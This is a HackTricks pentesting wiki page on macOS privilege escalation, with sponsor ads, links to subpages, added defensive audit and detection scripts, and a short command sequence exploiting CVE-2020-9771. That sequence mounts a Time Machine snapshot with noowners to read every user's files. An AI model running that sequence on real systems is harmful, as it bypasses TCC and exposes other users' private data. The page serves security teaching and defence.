# macOS Security & Privilege Escalation

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

**HackenProof is home to all crypto bug bounties.**

**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

## Basic MacOS

If you are not familiar with macOS, you should start learning the basics of macOS:

* Special macOS **files & permissions:**

{% content-ref url="macos-files-folders-and-binaries/" %}
[macos-files-folders-and-binaries](macos-files-folders-and-binaries/)
{% endcontent-ref %}

* Common macOS **users**

{% content-ref url="macos-users.md" %}
[macos-users.md](macos-users.md)
{% endcontent-ref %}

* **AppleFS**

{% content-ref url="macos-applefs.md" %}
[macos-applefs.md](macos-applefs.md)
{% endcontent-ref %}

* The **architecture** of the **kernel**

{% content-ref url="mac-os-architecture/" %}
[mac-os-architecture](mac-os-architecture/)
{% endcontent-ref %}

* Common macOS **network services & protocols**

{% content-ref url="macos-protocols.md" %}
[macos-protocols.md](macos-protocols.md)
{% endcontent-ref %}

* **Opensource** macOS: [https://opensource.apple.com/](https://opensource.apple.com/)
  * To download a `tar.gz`, change a URL such as [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) to [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz)

### MacOS MDM

In companies, **macOS** systems are very likely to be **managed with an MDM**. Therefore, from an attacker's perspective it is interesting to know **how that works**:

{% content-ref url="../macos-red-teaming/macos-mdm/" %}
[macos-mdm](../macos-red-teaming/macos-mdm/)
{% endcontent-ref %}

### MacOS - Inspecting, Debugging and Fuzzing

{% content-ref url="macos-apps-inspecting-debugging-and-fuzzing/" %}
[macos-apps-inspecting-debugging-and-fuzzing](macos-apps-inspecting-debugging-and-fuzzing/)
{% endcontent-ref %}

## MacOS Security Protections

{% content-ref url="macos-security-protections/" %}
[macos-security-protections](macos-security-protections/)
{% endcontent-ref %}

## Attack Surface

### File Permissions

If a **process running as root writes** a file that can be controlled by a user, the user could abuse this to **escalate privileges**.\
This could occur in the following situations:

* The file used was already created by a user (owned by the user)
* The file used is writable by the user because of a group
* The file used is inside a directory owned by the user (the user could create the file)
* The file used is inside a directory owned by root, but the user has write access over it because of a group (the user could create the file)

Being able to **create a file** that is going to be **used by root** allows a user to **take advantage of its content** or even create **symlinks/hardlinks** to point it somewhere else.

For this kind of vulnerability, don't forget to **check vulnerable `.pkg` installers**:

{% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %}
[macos-installers-abuse.md](macos-files-folders-and-binaries/macos-installers-abuse.md)
{% endcontent-ref %}
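The four situations above can be checked mechanically when auditing a root process (a launch daemon, an installer post-install script, a cron job) for the files it writes. The following is an added example, not code from the HackTricks page: a small POSIX shell helper that classifies a path into those situations (plus the symlink case from the paragraph above) from the point of view of the user running the check. Hardlinks are not detected here because that needs a portable link-count check; the labels and the `audit_root_writes` wrapper are this example's own naming.

```shell
#!/bin/sh
# Added example (not from the HackTricks page): classify a path that a root process
# is about to write into the user-controllable situations listed above, evaluated
# as the user running this script. Run it as the low-privileged user you are
# auditing, not as root (as root every path looks owned and writable).

# Print one label for the given path.
classify_root_write() {
    path=$1
    parent=$(dirname "$path")
    if [ -L "$path" ]; then
        # A symlink planted by the user redirects root's write somewhere else
        # (a hardlink would need a link-count check, omitted here).
        echo "symlink"
    elif [ -e "$path" ]; then
        if [ -O "$path" ]; then
            echo "owned-by-user"             # situation 1: file owned by the user
        elif [ -w "$path" ]; then
            echo "writable-via-group"        # situation 2: writable through a group
        else
            echo "not-user-controlled"
        fi
    elif [ ! -d "$parent" ]; then
        echo "parent-missing"                # nothing to create the file in
    elif [ -O "$parent" ]; then
        echo "parent-owned-by-user"          # situation 3: user owns the directory
    elif [ -w "$parent" ]; then
        echo "parent-writable-via-group"     # situation 4: directory writable via group
    else
        echo "not-user-controlled"
    fi
}

# Read one path per line on stdin and print "<label>\t<path>" for each.
# Usage: grep -o '/[^ "]*' /Library/LaunchDaemons/some.plist | audit_root_writes
audit_root_writes() {
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        printf '%s\t%s\n' "$(classify_root_write "$p")" "$p"
    done
}
```

Anything other than `not-user-controlled` or `parent-missing` for a file that root later reads, executes or overwrites is worth a closer look; the fix on the root side is to write only into root-owned, non-group-writable directories and to refuse to follow symlinks when opening the destination.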
### Entitlements and Privileges abuse via process abuse

If a process can **inject code into another process with better privileges or entitlements**, or contact it to perform privileged actions, it could escalate privileges and bypass defensive measures such as [Sandbox](macos-security-protections/macos-sandbox/) or [TCC](macos-security-protections/macos-tcc/).

{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse](macos-proces-abuse/)
{% endcontent-ref %}

### File Extension & URL scheme app handlers

Unusual apps registered as handlers for file extensions could be abused, and different applications can be registered to open specific URL schemes (protocols):

{% content-ref url="macos-file-extension-apps.md" %}
[macos-file-extension-apps.md](macos-file-extension-apps.md)
{% endcontent-ref %}

## MacOS Privilege Escalation

### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation

**Any user** (even unprivileged ones) can create and mount a Time Machine snapshot and **access ALL the files** of that snapshot.\
The **only privilege** needed is for the application used (like `Terminal`) to have **Full Disk Access** (FDA) (`kTCCServiceSystemPolicyAllfiles`), which needs to be granted by an admin.

{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Create a folder to mount it on
cd /tmp # I did it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work
```
{% endcode %}

A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
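From the defender's side, the observable artifact of the technique above is a local Time Machine snapshot mounted with the `noowners` option. The following is an added example, not code from the HackTricks page or from the original report: a POSIX shell filter that scans `mount` output for that pattern so it can be run periodically or fed into an endpoint check. The sample `mount` lines are constructed for the demonstration (the snapshot name, device and mount point are assumed values, not captured from a real host), and the mount-line layout `<snapshot>@<device> on <mountpoint> (<options>)` is the assumed macOS format.

```shell
#!/bin/sh
# Added example (not from the HackTricks page or the original report): flag
# Time Machine local snapshots that are mounted with "noowners".
# On a live macOS host:  mount | flag_snapshot_mounts

# Read `mount` output on stdin and print "<snapshot> on <mountpoint>" for each
# local snapshot mounted with the noowners option.
flag_snapshot_mounts() {
    while IFS= read -r line; do
        case "$line" in
            com.apple.TimeMachine.*@*" on "*"("*noowners*")")
                snap=${line%%@*}          # snapshot name, before the '@'
                rest=${line#* on }        # "<mountpoint> (<options>)"
                mnt=${rest%%" ("*}        # mount point, before " ("
                echo "$snap on $mnt"
                ;;
        esac
    done
}

# Convenience wrapper: number of flagged mounts in the given mount output.
count_snapshot_mounts() {
    printf '%s\n' "$1" | flag_snapshot_mounts | wc -l | tr -d ' '
}

# Constructed sample of `mount` output (not captured from a real host). The
# snapshot name, device and mount point are assumed values for the demo.
SAMPLE_MOUNT_OUTPUT='/dev/disk1s1 on / (apfs, local, read-only, journaled)
/dev/disk1s5 on /System/Volumes/Data (apfs, local, journaled, nobrowse)
com.apple.TimeMachine.2023-05-29-001751.local@/dev/disk1s5 on /tmp/snap (apfs, local, noowners, nobrowse)'
```

Running `printf '%s\n' "$SAMPLE_MOUNT_OUTPUT" | flag_snapshot_mounts` reports only the third line. A snapshot mounted by a regular user under a path such as `/tmp` is rarely legitimate, so a hit is a good trigger to review which application holds Full Disk Access and who mounted the snapshot; on patched systems the mount itself is the event to watch, since the FDA grant to the calling application is the precondition the page describes.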
### Sensitive Information

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
{% endcontent-ref %}

### Linux Privesc

First of all, note that **most of the privilege escalation tricks affecting Linux/Unix also affect macOS** machines. So see:

{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation](../../linux-hardening/privilege-escalation/)
{% endcontent-ref %}

## References

* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
* [**https://github.com/NicolasGrimonpont/Cheatsheet**](https://github.com/NicolasGrimonpont/Cheatsheet)
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)